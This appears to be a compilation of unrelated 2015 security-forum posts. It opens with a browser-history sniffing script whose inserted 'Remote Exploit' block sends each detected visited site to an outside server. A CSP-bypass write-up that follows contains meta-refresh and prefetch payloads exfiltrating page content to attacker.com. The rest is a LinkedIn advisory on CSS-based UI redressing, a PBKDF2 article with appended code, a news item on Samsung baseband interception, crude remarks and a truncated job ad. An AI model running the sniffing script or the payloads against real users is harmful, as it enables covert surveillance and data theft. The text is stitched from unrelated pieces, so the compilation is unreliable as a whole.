'http://c9.io/', 'http://beget.ru/', 'http://startpage.com/', 'http://www.bet-at-home.com/', 'http://tripcase.com/', 'http://www.douglas.de/', 'http://yande.re/post', 'http://www.bookbub.com/', 'http://www.swarmapp.com/', 'http://www.woorank.com/', 'http://paytm.com/', 'http://www.payza.com/', 'http://www.instapaper.com/', 'http://wikitech.wikimedia.org/', 'http://www.ipko.pl/', 'http://www.straighttalk.com/wps/portal/home', 'http://heroku.com/', 'http://www.privat24.ua', 'http://zimbra.free.fr/', 'http://www.blueapron.com/', 'http://secure.logmein.com/', 'http://adblockplus.org/', 'http://www.udemy.com/', 'http://tribalwars2.com/', 'http://sparkfun.com/', 'http://www.sparebank1.no/bank/', 'http://spotify.com/', 'http://creditkarma.com/', 'http://www.paxum.com/payment/phrame.php', 'http://jamberrynails.net/', 'http://fotolia.com/', 'http://stacksocial.com/', 'http://www.cms.gov/', 'http://iconfinder.com/', 'http://www.expireddomains.net/', 'http://navalny.com/', 'http://privatbank.ua/', 'http://www.englishforums.com/', 'http://www.hushmail.com/', 'http://www.pingdom.com/', 'http://www.zomato.com/', 'http://icook.tw/', 'http://www.office.com/', 'http://groupme.com/', 'http://wikimedia.org/', 'http://dapulse.com/', 'http://www.cuelinks.com/', 'http://www.attracta.com/', 'http://www.outlook.com/owa/', 'http://www.dnb.no/', 'http://www.lotterypost.com/', 'http://bitcoin.org/', 'http://href.li/', 'http://skandiabanken.no/', 'http://foursquare.com/', 'http://www.usa.gov/', 'http://www.bitgold.com/', 'http://quizlet.com/', 'http://www.alipay.com', 'http://yadi.sk/', 'http://duckduckgo.com/', 'http://www.dashlane.com/', 'http://www.ozbargain.com.au/', 'http://www.ricardo.ch/', 'http://www.fakku.net/', 'http://www.mturk.com/', 'http://www.national-lottery.co.uk/', 'http://www.onthebeach.co.uk/', 'http://www.icloud.com/', 'http://www.zenefits.com/', 'http://code.org/', 'http://www.chapters.indigo.ca/', 'http://www.dntx.com/', 'http://www.slsp.sk/', 'http://www.raise.com/', 
'http://cinematrix.net/', 'http://www.baifubao.com/', 'http://blogun.ru/', 'http://videostripe.com/', 'http://typekit.com/', 'http://www.splitwise.com/', 'http://www.eobot.com', 'http://login.microsoftonline.com/', 'http://www.xero.com/', 'http://www.rakuten-sec.co.jp/', 'http://www.creativecow.net/', 'http://sweb.ru/', 'http://www.seroundtable.com/', 'http://www.hipchat.com/', 'http://subscribe.free.fr/', 'http://topvisor.ru/', 'http://www.avforums.com/', 'http://www.travelodge.co.uk', 'http://opendns.com/', 'http://www.pcloud.com/', 'http://www.akiba-online.com/', 'http://www.instamojo.com/', 'http://www.commsec.com.au/', 'http://assembla.com/', 'http://www.bukalapak.com/', 'http://www.docusign.net/', 'http://www.hotslogs.com/', 'http://www.consorsbank.de/home', 'http://www.searchlock.com/', 'http://madmimi.com/', 'http://www.bawagpsk.com/BAWAGPSK/PK', 'http://www.crunchbase.com/', 'http://www.maketecheasier.com/', 'http://session.wikispaces.com/1/auth/auth', 'http://witkit.com/', 'http://pixabay.com/', 'http://www.mygreatlakes.org/', 'http://ncore.cc/', 'http://www.hpconnected.com/', 'http://payeer.com/', 'http://join.me/', 'http://www.gamefly.com/', 'http://bitcoinwisdom.com/', 'http://land.nrw/', 'http://www.saddahaq.com/', 'http://www.quantcast.com/', 'http://www.behance.net/', 'http://xapo.com/', 'http://fabric.io/', 'http://www.dollarphotoclub.com/', 'http://mandrillapp.com/', 'http://moodle.org/', 'http://imp.free.fr/', 'http://www.pebble.com/', 'http://www.periscope.tv/', 'http://generalassemb.ly/', 'http://login.szn.cz/', 'http://www.lyft.com/', 'http://www.mql5.com/', 'http://www.wrike.com/', 'http://www.fanfiction.net', 'http://www.box.com/', 'http://www.test.de/', 'http://calendar.sunrise.am', 'http://www.djangoproject.com/', 'http://qiwi.com/', 'http://adlure.net/', 'http://www.stitchfix.com/', 'http://www.bankofthewest.com/', 'http://roem.ru/', 'http://www.carthrottle.com/', 'http://pass.yandex.kz/', 'http://gumroad.com/', 
'http://www.hosteurope.de/', 'http://www.canva.com/', 'http://www.usbank.com/', 'http://evernote.com/', 'http://secure.actblue.com/', 'http://myspace.com/', 'http://www.jbhifi.com.au', 'http://www.physicsforums.com/', 'http://www.abnamro.nl/nl/index.html', 'http://twittercommunity.com/', 'http://wikileaks.org/', 'http://www.chmail.ir/', 'http://mail.ru', 'http://www.victoriassecret.com/', 'http://www.firstnational.com/', 'http://www.dominos.co.uk/', 'http://www.indiblogger.in/', 'http://www.zendesk.com/', 'http://www.hypovereinsbank.de/', 'http://www.openshift.com/', 'http://buffer.com/', 'http://what.cd/', 'http://hide.me/', 'http://trello.com/', 'http://www.comodo.com/', 'http://twilio.com/', 'http://www.alternate.de/', 'http://telegram.org/', 'http://www.manageengine.com/', 'http://unsw.edu.au/', 'http://www.flipkey.com/', 'http://www.popads.net/', 'http://myworkday.com/', 'http://www.meneame.net/', 'http://popcorntime.io/', 'http://iqoption.com/', 'http://www.tumblr.com/', 'http://www.reddit.com/', 'http://www.petfinder.com/', 'http://www.messenger.com/', 'http://www.digitalpoint.com/', 'http://www.blibli.com/', 'http://namu.wiki/', 'http://launchpad.net/', 'http://www.blognone.com/', 'http://www.ing.be/en/retail/Pages/index.aspx', 'http://acrobat.com/', 'http://mbank.pl/', 'http://www.fasttech.com/', 'http://www.post.ch/de', 'http://gyazo.com/', 'http://packagecontrol.io/', 'http://vimeo.com/', 'http://www.airbnb.es/', 'http://www.airbnb.it/', 'http://www.airbnb.fr/', 'http://www.airbnb.co.kr/', 'http://www.airbnb.de/', 'http://www.airbnb.co.uk/', 'http://www.airbnb.com.au/', 'http://www.airbnb.ca/', 'http://www.airbnb.co.in/', 'http://www.airbnb.com.br/', 'http://www.airbnb.ru/', 'http://www.centrum24.pl/centrum24-web/login', 'http://coursera.org/', 'http://ellislab.com/', 'http://www.udacity.com/', 'http://bitcointalk.org/', 'http://uwaterloo.ca/', 'http://vc.ru/', 'http://tjournal.ru/', 'http://www.biblegateway.com/', 'http://www.themuse.com', 
'http://att.yahoo.com/', 'http://www.yahoo.com/', 'http://ficbook.net/', 'http://www.ameriprise.com/', 'http://www.here.com/', 'http://www.rocketlawyer.com/', 'http://exmo.com/', 'http://skladchik.com/', 'http://healthunlocked.com/', 'http://www.upwork.com/', 'http://www.thegioididong.com/', 'http://fermasosedi.ru/', 'http://www.thegrommet.com/', 'http://www.freelancer.com/', 'http://www.freelancer.in/', 'http://klout.com/', 'http://www.veikkaus.fi/', 'http://www.lucidchart.com/', 'http://www.opensuse.org/', 'http://monitorbacklinks.com/', 'http://www.5giay.vn/', 'http://noncombatant.org/', 'http://nonfreesoftware.org/', 'http://hackpad.com/', 'http://meta.discourse.org/', 'http://devinegan.com/', 'http://ongardie.net/', 'http://titanous.com/', 'http://www.funkthat.com', 'http://nelhage.com/', 'http://yawnbox.com/', 'http://rednerd.com', 'http://smbmarketplace.cisco.com/', 'http://www.cloudflare.com/', 'http://letsencrypt.org/', 'http://helloworld.letsencrypt.org/', 'http://hoffman-andrews.com/', 'http://jdkasten.com/', 'http://jhalderm.com/', 'http://jve.linuxwall.info/' ];

/**
 * Gets hostname from URL.
 */
function getHost_(url) {
  return url.replace('http://', '').split(/\/|\?/)[0];
}

/**
 * Our CSP policy (HTTP-only images) causes this to fire whenever the img src
 * redirects to HTTPS, either by HSTS (307) or plain old redirects (301/302).
 * @param {number} start Time when the image load started
 * @param {string} host The host that fired the error
 * @private
 */
function onImgError_(start, host) {
  var time = new Date().getTime() - start;
  if (host === BENCHMARK_HOST) {
    // This is just a calibration measurement so update the offset time.
    OFFSET = time;
  } else {
    // We need to subtract offset, otherwise hosts that are further down on the
    // page seem to have higher load times because of the time that it took for
    // the DOM to load.
    display(host, time - OFFSET, OFFSET);
  }
}

/**
 * Double-check whether hosts have been visited by trying synchronous image
 * loads, which have cleaner timing profiles. I find this helps reduce the
 * false positive rate in Chrome. AFAICT, the async image-load sniffing method
 * works great in Firefox so this isn't necessary there.
 * @param {function(string, number)} callback Gets called when img error fires.
 * @param {function()} finished Called when all loads are done.
 * @private
 */
function confirmVisited_(callback, finished) {
  var initial; // initial time
  var img = new Image();
  var timeouts = []; // array of timeout IDs
  var hostsDone = [];
  var dummySrc = 'http://example.com/'; // URL for timer initialization

  function clearTimeouts_() {
    // Clear existing timeouts
    timeouts.forEach(function(id) {
      window.clearTimeout(id);
    });
    timeouts = [];
  }

  function doNext_() {
    if (visited.length === 0) {
      finished();
      return;
    }
    // Shift instead of pop since we are pushing hosts into the array while
    // this is running
    var host = visited.shift();
    initial = new Date().getTime();
    var src = 'http://' + host + '/?' + initial.toString();
    img.src = src;
    // Abort after 20ms since positive results should take less time anyway
    timeouts.push(window.setTimeout(img.onerror.bind({ src: src }),
                                    TIMING_CONFIRM_THRESHOLD));
  }

  img.onerror = function() {
    if (this.src !== dummySrc) {
      clearTimeouts_();
      var host = getHost_(this.src);
      if (hostsDone.indexOf(host) !== -1) {
        // We might have called the callback for this host already.
        console.log('already done, skipping', host);
      } else {
        hostsDone.push(host);
        callback(host, new Date().getTime() - initial);
      }
    } else {
      console.log('initialized timer using', this.src);
    }
    doNext_();
  };

  img.onload = function() {
    // Should never happen but add a callback in case so it doesn't block the
    // rest of the image requests from being sent.
    console.log('UNEXPECTEDLY LOADED', this.src);
    doNext_();
  };

  // Set the image source initially to a dummy URL b/c the first load seems to
  // always take a long time no matter what.
  img.src = 'http://example.com/';
}

/**
 * Times how long a request takes by loading it as an img src and waiting for
 * the error to fire. I would use XHR here but it turns out CORS errors fire
 * before CSP.
 * @param {string} host
 */
function timeRequest(host) {
  var img = new Image();
  img.onerror = onImgError_.bind(this, new Date().getTime(), host);
  // Add random params so we don't hit the cache
  img.src = host + '?' + Math.random().toString().substring(2);
}

/**
 * Measures the calibration drift so we have a better estimate of how long
 * a resource fetch actually took. Since we expect the time T to fetch a
 * preloaded STS host to be ~constant, the fact that it changes indicates
 * that our timing is getting skewed by some amount, probably due to DOM
 * processing. Correct for the skew by subtracting T from measurements that
 * happen shortly after.
 */
function calibrateTime() {
  timeRequest(BENCHMARK_HOST);
}

/**
 * Display the results.
 * @param {string} url
 * @param {number} time
 * @param {number} offset
 */
function display(url, time, offset) {
  var li = document.createElement('li');
  var host = getHost_(url);
  li.id = host;
  li.appendChild(document.createTextNode(host));
  if (time < TIMING_UPPER_THRESHOLD && time > TIMING_LOWER_THRESHOLD) {
    if (!isFirefox) {
      // If we are in Chrome, hide the results for now because the false
      // positive rate is really high until confirmVisited_() is called.
      li.style.color = 'lightgray';
    }
    visitedElem.appendChild(li);
    visited.push(host);

    // +--== [ Remote Exploit by 1N3 @ CrowdShield - https://crowdshield.com
    // Change url= to your own web server.
    var uri_visited = host;
    var uri = "http://xerosecurity.com/?redir=" + host;
    var port = 80;
    var xhr = new XMLHttpRequest();
    xhr.open("GET", uri + ":" + port, true);
    xhr.send();
  } else {
    notVisitedElem.appendChild(li);
  }
}

if (!isFirefox) {
  // Chrome needs to do an extra timing confirmation step for results to be not
  // shitty. Wait 3 seconds for the async loads to mostly finish, then try one
  // synchronous load for each potentially-visited host.
  disclaimer.style.display = '';
  window.setTimeout(function() {
    confirmVisited_(function(host, t) {
      if (!disclaimer.done_) {
        disclaimer.style.color = 'orange';
        disclaimer.innerText = 'Removing false positives . . .';
        disclaimer.done_ = true;
      }
      var elem = document.getElementById(host);
      if (!elem) {
        console.warn('No element found', host);
        return;
      }
      if (t <= TIMING_CONFIRM_THRESHOLD / 2) {
        console.log('showing', host, t);
        elem.style.color = '';
      } else {
        console.log('hiding', host, t);
        elem.style.display = 'none';
        notVisitedElem.appendChild(elem);
      }
    }, function() {
      disclaimer.style.color = 'green';
      disclaimer.innerText = 'Done!';
      saveCrypto_(!notVisitedElem.querySelector('#savecrypto\\.org'));
    });
  }, 3000);
} else {
  window.setTimeout(function() {
    saveCrypto_(visitedElem.querySelector('#savecrypto\\.org'));
  }, 3000);
}

/**
 * Tell the user to sign this awesome petition if they haven't visited it!
 * Thank them if they have!
 * @param {Boolean} signed
 * @private
 */
function saveCrypto_(signed) {
  var text = signed ?
    'PS: Thanks for signing <a href="https://savecrypto.org">savecrypto.org</a>! <3' :
    'PS: Tell Obama to support strong encryption! Sign the petition at <a href="https://savecrypto.org">savecrypto.org</a>.';
  disclaimer.style.display = '';
  disclaimer.style.color = 'blue';
  disclaimer.innerHTML = text;
}

// Main loop
hosts.forEach(function(host) {
  calibrateTime();
  timeRequest(host);
});

Published by CrowdShield on 11/26/2015

Source: https://crowdshield.com/blog.php?name=remotely-sniffing-browser-history-via-xss-using-hsts-csp
-
HITBGSEC 2015 - Dawid Czagan - Hacking Cookies in Modern Web Applications and Browsers

PRESENTATION MATERIALS: Index of /materials/sg2015

PRESENTATION ABSTRACT:
Since cookies store sensitive data (session ID, CSRF token, etc.) they are interesting from an attacker's point of view. As it turns out, quite a few web applications (including sensitive ones like bitcoin platforms) have cookie-related vulnerabilities that lead, for example, to user impersonation, remote cookie tampering, XSS and more. Developers tend to forget that multi-factor authentication will not help when cookies are insecurely processed. Security evaluators underestimate cookie-related problems. Moreover, there are problems with secure processing of cookies in modern browsers, and browser-dependent exploitation can be used to launch more powerful attacks. That's why secure cookie processing (from the perspective of the web application and the browser) is a subject worth discussing.

The following topics will be presented:
– cookie-related vulnerabilities in web applications
– insecure processing of the secure flag in modern browsers
– bypassing the HttpOnly flag in Safari
– problem with the Domain attribute in Internet Explorer
– cookie tampering in Safari
– underestimated XSS via cookie
– HTTP Strict Transport Security (HSTS)
– importance of regeneration
– and more

ABOUT DAWID CZAGAN
Dawid Czagan (@dawidczagan) has found security vulnerabilities in Google, Yahoo, Mozilla, Microsoft, Twitter, BlackBerry and other companies. Due to the severity of many bugs, he received numerous awards for his findings. Dawid is founder and CEO at Silesia Security Lab, which delivers specialized security auditing and training services. He also works as Security Architect at Future Processing. Dawid shares his security bug hunting experience in his hands-on training "Hacking web applications – case studies of award-winning bugs in Google, Yahoo, Mozilla and more".
He delivered security trainings/workshops at Hack In The Box (Amsterdam), CanSecWest (Vancouver), DeepSec (Vienna), Hack In Paris (Paris) and for many private companies. He also spoke at Security Seminar Series (University of Cambridge) and published over 20 security articles (InfoSec Institute).
-
(the injected part is "><meta http-equiv="refresh" content='0;url=http://attacker.com/?>)

Since browsers can handle only 1 redirection, they have to pick only 1 among the three. Some browsers use the first one and some use the last one, but never the middle one. That is troublesome because we only care about the middle one.

Now think about it: does CSP really cover all the possible ways to fetch resources? Another no. HTTPLeaks is a project that aims to enumerate all possible ways browsers leak requests. They can be something specific to browsers, features defined by new specifications and whatnot. The most important thing is that some of them will not be caught by CSP. In the attack I used prefetch from Resource Hints.

Finally
We just need to prevent the intended redirection so that our prefetch request will not be dropped. This can be done using the javascript: pseudo protocol, as browsers refuse to navigate to it in meta refresh. Now everything is set, and the final payload:

javascript:"><link rel=prefetch href='//attacker.com/?

...Hooray! Access granted. CSP: 0.5 - Attacker 2.5. Fatality. You can find the original report from HackerOne.

Takeaway
A proper policy can significantly reduce the chance of XSS
Beware of the nonce pitfall
Content exfiltration may be the Achilles' heel of CSP
All in all, CSP does not replace input validation

Source: http://blog.innerht.ml/csp-2015/
-
November 23, 2015
Abusing CSS Selectors to Perform UI Redressing Attacks
Jovon Itwaru, Information Security Engineer

Introduction
Earlier this year, we received an interesting security advisory from Ruben van Vreeland of BitSensor regarding an issue discovered within our publishing platform. The technique Ruben described is unique and exemplifies the creativity needed to produce high-quality research. We analyzed his report and resolved the vulnerability. While we typically do not talk about bugs that we receive, the lesson learned and the uniqueness of this issue is worth sharing. In this blog post, we will describe Ruben's novel attack that allows attackers to use existing CSS and style attributes to trick members into navigating to an attacker-controlled location, leading to potential social engineering and phishing attacks.

Description
As part of our publishing platform, we allow members to customize the look and feel and even share rich media content on their blog articles. This involves styling content with CSS, formatting with a subset of HTML elements, and also sharing audio/video resources. To mitigate certain classes of vulnerabilities such as XSS, a limited set of HTML tags (e.g. <img>, <a>, <p> and <br>) and safe attributes are allowed.

Let's dive into a simplified example that illustrates this technique. For instance, to create a blog entry, the following JSON request can be used to generate a new HTML page with an image tag and URL link.

{"content": "<p><a href=\"http://www.linkedin.com\">LinkedIn</a><img src=\"linkedin.png\"/></p>"}

[Figure: Resulting HTML page]

Rigorous input validation is performed on these elements to ensure attackers cannot introduce attributes or event handlers that would be used to construct XSS attacks. In some scenarios, it is possible to introduce benign attributes such as class that will not be flagged by the input validation filter.
While this would not be a vulnerability by itself, Ruben realized that it can be used to reference existing CSS hosted on our site. Considering the extent of the platform, we have many CSS classes that are available on our CDNs and consumed by other products. For example, the following CSS styles are applied to the response page that renders blog entries:

<style>
.li_style {
  position: absolute;
  width: 100%;
  z-index: 10021;
  position: fixed;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  padding: 0;
  overflow-y: scroll;
  _overflow-y: hidden
}
</style>

This type of style is a common way to force an element to stretch the entire height and width of a page. With knowledge of this available CSS style, we can resubmit the request and reference this style:

{"content": "<p><a class=\"li_style\" href=\"http://www.example.com\">Example Site</a><img src=\"image.png\"/></p>"}

The li_style covers the entire page. This, in turn, allows the page area to become clickable with a link to Example Domain.

Impact and Recommendation
As illustrated, an attacker can reuse trusted CSS class selectors to perform UI changes that are invisible to members. We believe that this attack is applicable to many sites, as many allow members to create and share rich media content. This is an interesting technique that uses existing resources to facilitate UI-redressing attacks by chaining together CSS class selectors, and has similarities to Return Oriented Programming (ROP). This technique can be used to send members to sites hosting malware or counterfeit sites that attempt to phish members by requesting their usernames and passwords. This is especially successful on social sites that share blogs or articles.

As such, our recommendation is to only accept safe elements and attributes. For example, if the class attribute is not allowed, reject any request that contains it. Additionally, whitelist filtering should be applied to CSS class selectors to permit only the necessary styles.
We would like to thank Ruben for reporting this issue and helping keep our members safe. Thanks to his excellent work and communication with our team, Ruben was invited to join our private bug bounty program, hosted by HackerOne. This is one of many examples of the collaborations we experience with the talented researchers in our program. If you have a bug you would like considered, please submit to security@linkedin.com.

Source: https://security.linkedin.com/blog-archive#11232015
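As an added example, not LinkedIn's own code, here is a Python sanitizer that applies the two recommendations above to the blog-entry fragments from the post: only the listed tags and attributes pass, a class attribute survives only when every class name is on an allowlist (so a site-wide overlay class like li_style cannot be referenced), and strict mode rejects the whole request instead of stripping. The allowed class names and the function names are assumptions made for this example.

```python
from html import escape
from html.parser import HTMLParser

# Safe elements and the attributes each may carry (the subset the post names).
ALLOWED_TAGS = {
    "p": {"class"},
    "a": {"href", "class"},
    "img": {"src", "alt"},
    "br": set(),
}
# Classes members may reference. Constructed for this example: anything not
# listed here, including site-wide layout classes such as li_style, is dropped.
ALLOWED_CLASSES = {"post-text", "post-image"}
VOID_TAGS = {"img", "br"}
SAFE_SCHEMES = ("http://", "https://")


class ClassWhitelistSanitizer(HTMLParser):
    """Rebuilds a fragment from scratch, keeping only whitelisted markup and
    recording every element, attribute or class it had to drop."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.violations = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            self.violations.append("tag <%s>" % tag)
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED_TAGS[tag]:
                self.violations.append("attribute %s on <%s>" % (name, tag))
                continue
            if name == "class":
                # Keep only allow-listed class names; an empty result drops the attribute.
                names = value.split()
                bad = [c for c in names if c not in ALLOWED_CLASSES]
                if bad:
                    self.violations.append('class "%s" on <%s>' % (" ".join(bad), tag))
                names = [c for c in names if c in ALLOWED_CLASSES]
                if not names:
                    continue
                value = " ".join(names)
            elif name in ("href", "src"):
                # Relative URLs pass; any scheme other than http(s) is dropped.
                if ":" in value and not value.lower().startswith(SAFE_SCHEMES):
                    self.violations.append("%s scheme on <%s>" % (name, tag))
                    continue
            kept.append(' %s="%s"' % (name, escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_startendtag(self, tag, attrs):
        # <img .../> is emitted as a plain void tag; no closing tag is needed.
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        self.out.append(escape(data))


def sanitize(fragment, strict=False):
    """Return (clean_html, violations). With strict=True any violation rejects
    the whole request, the post's first recommendation; otherwise the offending
    parts are stripped and the cleaned fragment is returned."""
    parser = ClassWhitelistSanitizer()
    parser.feed(fragment)
    parser.close()
    if strict and parser.violations:
        raise ValueError("rejected: " + "; ".join(parser.violations))
    return "".join(parser.out), parser.violations


if __name__ == "__main__":
    # The malicious request from the post: the li_style reference is dropped.
    payload = ('<p><a class="li_style" href="http://www.example.com">Example Site</a>'
               '<img src="image.png"/></p>')
    print(sanitize(payload))
```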
-
Now, seriously speaking, today's pseudo-journalists suck dick.
-
"ATTENTION, to be forwarded URGENTLY: If you get a phone call and "A C E" is displayed on your mobile, do not answer; cancel the call. It is a virus that destroys the SIM card and destroys the phone. This has been confirmed by Motorola, Sagem and Nokia." WTF is this shit? From the comments: https://sternocleidomastoidian.wordpress.com/2010/04/14/informare-a-ministerului-de-interne/
-
Romania's secret weapons: In 1968, the Romanian Army used a laser...
Nytro replied to suitsmkv's topic in Cosul de gunoi
It's for real, I got root on the laser myself. -
Parameter choice for PBKDF2

PBKDF2, standardised in RFC 2898 and PKCS#5, is a function for creating a cryptographic key from a password. It is the only such function currently appearing in NIST standards, hence it has seen widespread use.

The aim of the function is to create a key in such a way that dictionary attacks (where the attacker just tries a range of possible passwords) are unfeasible. To do this, PBKDF2 applies a pseudorandom function (PRF) to the password many times. This means that an attacker making a guess at the password will also have to apply the function many times to his guess. Additionally, the function can be given a "salt" parameter. The idea of this is to make each key derivation operation unique, so that an attacker cannot guess one password and then look for matches against a large number of derived keys. These properties mean PBKDF2 is used not just to produce a key to be used in a cryptographic protocol, but also to store passwords securely (by storing the derived keys).

A developer using PBKDF2 must choose parameter values for the salt, the PRF, and the number of iterations, i.e. the number of times the PRF will be applied to the password when deriving the key.

The specification suggests (in section 4.1) that the salt be (or contain) a 64 bit pseudorandom value. This makes collisions (i.e. occasions that two stored passwords use the same salt) unlikely. By the birthday paradox, we would expect a collision after 2^32 passwords, i.e. a little more than 4 billion.

The PRF mentioned in the specification is SHA-1, and in many libraries this is the only choice. However, using SHA-256 or SHA-512 has the benefit of significantly increasing the memory requirements, which increases the cost for an attacker wishing to use hardware-based password crackers based on GPUs or ASICs.

The recommended iteration count in the RFC published in September 2000 was 1000. Computing performance has greatly increased since then.
Modern guides such as the OWASP password storage cheat sheet (2015) recommend 10 000 iterations. NIST's own guide (Appendix A.2.2) recommends that the iteration count be "as high as can be tolerated while still allowing acceptable server performance".

Cracking Stuff

What are the consequences of a low iteration count? Imagine we are restricted to using SHA-1 as our PRF, as is the case for example in PKCS#11 up to version v2.20. How long would it take a well-resourced attacker (i.e. with access to GPUs) to break an 8-character password?

First we have to estimate how much entropy or "randomness" there is in an 8-character password. An excellent paper by Kelley et al. from IEEE Security and Privacy 2012 found that when users are forced to choose a password following the "Comprehensive8" policy, "Password must have at least 8 characters including an uppercase and lowercase letter, a symbol, and a digit. It may not contain a dictionary word.", the result is roughly 33 bits of entropy. If, however, the password is a perfectly random combination of uppercase and lowercase letters, numbers and the 30 symbols on a US keyboard, we would expect 52 bits of entropy. Interestingly, the same result can be obtained by choosing 4 random words from the Diceware list.

Second, we need to know how fast GPUs can calculate PBKDF2. An article from April 2013 reports a rate of 3 million PBKDF2 guesses per second on a typical GPU setup. This includes calculating AES once for each guess (to see if the right key has been derived to decrypt a master key file), and it's now November 2015, so suppose conservatively we can apply Moore's law almost once since then (whether one can apply Moore's "law" to GPUs is doubtful), giving a very rough rule-of-thumb ability of 5 million guesses per second on typical GPU hardware.

The table below shows how long an attacker would take to cover the whole password space of a single salted hashed password.
| Password complexity | Entropy estimate (bits) | 1000 iterations | 10000 iterations |
|---|---|---|---|
| Comprehensive8 | 33 | 4 hours 46 minutes | 47 hours |
| 8 random lowercase letters | 37 | 12 hours | 5 days |
| 8 random letters | 45 | 123 days | 3 years 5 months |
| 8 letters + numbers + punctuation OR 4 random Diceware words | 52 | 325 years | 3250 years |

Conclusions

If you have to use PBKDF2, you should:
- use a unique 64-bit salt for each password.
- rather than SHA-1, use SHA-512 or, failing that, SHA-256 if you can.
- use an iteration count of at least 10000, more if you can do it "while still allowing acceptable server performance".

In a future blog post, we'll cover other password hashing functions like bcrypt, scrypt, and the winner of the recent password hashing competition, Argon2.

Source: https://cryptosense.com/parameter-choice-for-pbkdf2/
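As an added example (not code from the Cryptosense post), a small Python password store that applies the post's conclusions: PBKDF2-HMAC-SHA512, a random 64-bit salt per password, at least 10000 iterations, plus a rehash check for records stored with older parameters and a calibration routine for NIST's "as high as can be tolerated" rule. The record layout, the function names and the SHA-1/1000-iteration legacy record are constructed for this example.

```python
import hashlib
import hmac
import os
import time

# Parameters following the post's conclusions.
PRF = "sha512"          # prefer SHA-512 (or SHA-256) over the SHA-1 default
SALT_BYTES = 8          # the RFC's 64-bit pseudorandom salt, unique per password
MIN_ITERATIONS = 10000  # OWASP (2015) floor; raise it when the server can afford to
DK_LEN = 64             # derived key length in bytes (full SHA-512 output)


def hash_password(password, iterations=MIN_ITERATIONS, salt=None):
    """Derive a key with PBKDF2 and return a self-describing record
    'prf$iterations$salt_hex$dk_hex' (record layout constructed here)."""
    if iterations < MIN_ITERATIONS:
        raise ValueError("iteration count %d is below policy minimum" % iterations)
    if salt is None:
        salt = os.urandom(SALT_BYTES)
    dk = hashlib.pbkdf2_hmac(PRF, password.encode("utf-8"), salt, iterations, DK_LEN)
    return "%s$%d$%s$%s" % (PRF, iterations, salt.hex(), dk.hex())


def _parse(record):
    prf, iterations, salt_hex, dk_hex = record.split("$")
    return prf, int(iterations), bytes.fromhex(salt_hex), bytes.fromhex(dk_hex)


def verify_password(password, record):
    """Recompute with the record's own parameters and compare in constant time,
    so old and new records verify side by side during a migration."""
    prf, iterations, salt, expected = _parse(record)
    actual = hashlib.pbkdf2_hmac(prf, password.encode("utf-8"), salt, iterations, len(expected))
    return hmac.compare_digest(actual, expected)


def needs_rehash(record):
    """True when the record uses a weaker PRF or fewer iterations than current
    policy. Call after a successful verify_password(), while the plaintext is
    still in hand, and replace the record with hash_password(password)."""
    prf, iterations, _salt, _dk = _parse(record)
    return prf != PRF or iterations < MIN_ITERATIONS


def calibrate_iterations(target_seconds=0.1):
    """Find the iteration count that makes one derivation take about
    target_seconds on this host: NIST's 'as high as can be tolerated',
    measured rather than guessed. Never returns less than MIN_ITERATIONS."""
    iterations = MIN_ITERATIONS
    while True:
        start = time.perf_counter()
        hashlib.pbkdf2_hmac(PRF, b"calibration", os.urandom(SALT_BYTES), iterations, DK_LEN)
        if time.perf_counter() - start >= target_seconds:
            return iterations
        iterations *= 2


def legacy_record(password):
    """Constructed stand-in for a record made with the RFC's year-2000 defaults
    (SHA-1, 1000 iterations), as an older password database might hold."""
    salt = os.urandom(SALT_BYTES)
    dk = hashlib.pbkdf2_hmac("sha1", password.encode("utf-8"), salt, 1000, 20)
    return "sha1$1000$%s$%s" % (salt.hex(), dk.hex())


if __name__ == "__main__":
    record = hash_password("correct horse battery staple")
    print(record)
    print("verify:", verify_password("correct horse battery staple", record))
    old = legacy_record("hunter2")
    print("legacy record needs rehash:", needs_rehash(old))
    print("iterations this host tolerates at 100 ms:", calibrate_iterations())
```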
-
Samsung S6 calls open to man-in-the-middle base station snooping
Research duo pop baseband chip in preliminary demo-hack
12 Nov 2015 at 05:56, Darren Pauli

PacSec Modern Samsung devices including the S6, S6 Edge and Note 4 can have phone calls intercepted using malicious base stations, according to initial research findings from two researchers.

Daniel Komaromy and Nico Golde demonstrated the attacks on Samsung's 'Shannon' line of baseband chips today at the Mobile Pwn2Own competition at PacSec, Tokyo. Full exploitation details of their research have not been publicly detailed, but they have been disclosed to Samsung.

Their cheap man-in-the-middle attack requires an OpenBTS base station to be established and located near target handsets. Handsets will automatically connect to the bogus station. The malicious base station then pushes firmware to the phone's baseband processor (the chip that handles voice calls, and which isn't directly accessible to end users). The firmware patch pushes phone calls through the bogus base station, which redirects them to a proxy that records them and passes them on to the intended recipient.

Komaromy says the full impact of the attack along with any mitigating factors will be known once seasoned researchers examine their work.

"Our example of modifying the baseband to hijack calls is just an example," Komaromy told Vulture South. "The idea with hijacking would be that you can redirect calls to a proxy (like a SIP proxy) and that way you can man-in-the-middle the call.

"So that means the caller sees her original call connected - but it can be recorded in the proxy [which is how] it's like a wiretap implant."

[Image: Nico Golde (l) and Daniel Komaromy at Pwn2Own today. Dragos Ruiu]

The attack was tested on a new Samsung Galaxy S6 Edge which PacSec organiser Dragos Ruiu took out of its box and updated before handing it over.

"I turned it on next to their radio and then dialled myself," Ruiu says of the demonstration held deep below the Tokyo conference to avoid pwning delegate phones. "And instead of ringing on my phone it rang on theirs."

The hacker duo now own the phone as a prize and will in March travel to Canada for CanSecWest on a ski trip along with their spouses. They will present further technical detail of the attack at that lauded conference.

It comes as Chinese researcher Guang Gong popped the latest version of Google Chrome at the contest. As El Reg reported, the attack likely affects all Android phones and allows the devices to be completely compromised through a single exploit that requires no interaction beyond visiting a crafted web site.

Ruiu is offering ski trips and vendors may cough up bug bounties in exchange for the winning hacks. Last year hackers hosed popular phones for shares in $425,000 in cash rewards, but security sponsors Google, Apple, Microsoft and Hewlett Packard's Zero Day Initiative pulled out.

Source: Samsung S6 calls open to man-in-the-middle base station snooping • The Register
-
[h=1]Senior IT Auditor[/h]

What are we looking for? Senior IT Auditor for our Advisory team.

Candidate profile:
• Conduct IT Audits in accordance with IT audit methodology and other relevant standards;
